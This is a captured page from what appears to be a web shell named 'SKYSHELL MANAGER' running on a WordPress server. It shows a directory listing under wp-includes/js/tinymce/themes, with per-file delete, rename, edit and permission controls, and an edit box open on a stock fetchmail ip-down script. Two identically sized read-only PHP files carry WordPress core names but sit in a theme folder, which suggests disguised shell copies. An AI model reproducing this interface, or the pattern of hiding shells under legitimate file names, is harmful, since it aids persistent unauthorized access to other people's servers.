📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: fetchmail
#!/bin/sh # # Default fetchmail ip-down script (/etc/ppp/ip-down.d/fetchmail) # # Remove the "exit 0" line if you want only want to run fetchmail when the # PPP link is up. # exit 0 if [ -x /etc/init.d/fetchmail ]; then invoke-rc.d --quiet fetchmail stop || true fi
Save